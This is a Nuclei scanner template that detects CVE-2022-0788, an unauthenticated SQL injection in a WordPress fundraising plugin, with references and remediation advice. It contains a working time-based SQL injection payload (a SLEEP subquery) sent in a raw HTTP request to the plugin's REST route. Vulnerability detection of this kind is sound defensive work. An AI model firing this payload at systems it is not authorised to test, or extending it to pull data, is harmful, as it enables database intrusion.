nuclei-templates/http/cves/2022/CVE-2022-0788.yaml

51 lines
2.3 KiB
YAML

id: CVE-2022-0788
info:
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
author: theamanrawat
severity: critical
description: |
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or manipulation of the WordPress database.
remediation: |
Update WP Fundraising Donation and Crowdfunding Platform to version 1.5.0 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0788
cwe-id: CWE-89
epss-score: 0.02409
epss-percentile: 0.88753
cpe: cpe:2.3:a:wpmet:wp_fundraising_donation_and_crowdfunding_platform:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpmet
product: wp_fundraising_donation_and_crowdfunding_platform
framework: wordpress
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan,wpmet
http:
- raw:
- |
@timeout: 10s
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
condition: and
# digest: 490a0046304402200a18f4ad9aa2154e45ea5f3c481c7d00bc006fd1c8cccd7448ce7c678d16e17602205c14752b9890d739d66b3203ef92f510d4ae9c82c9a5541f5aba396960c08570:922c64590222798bb761d5b6d8e72950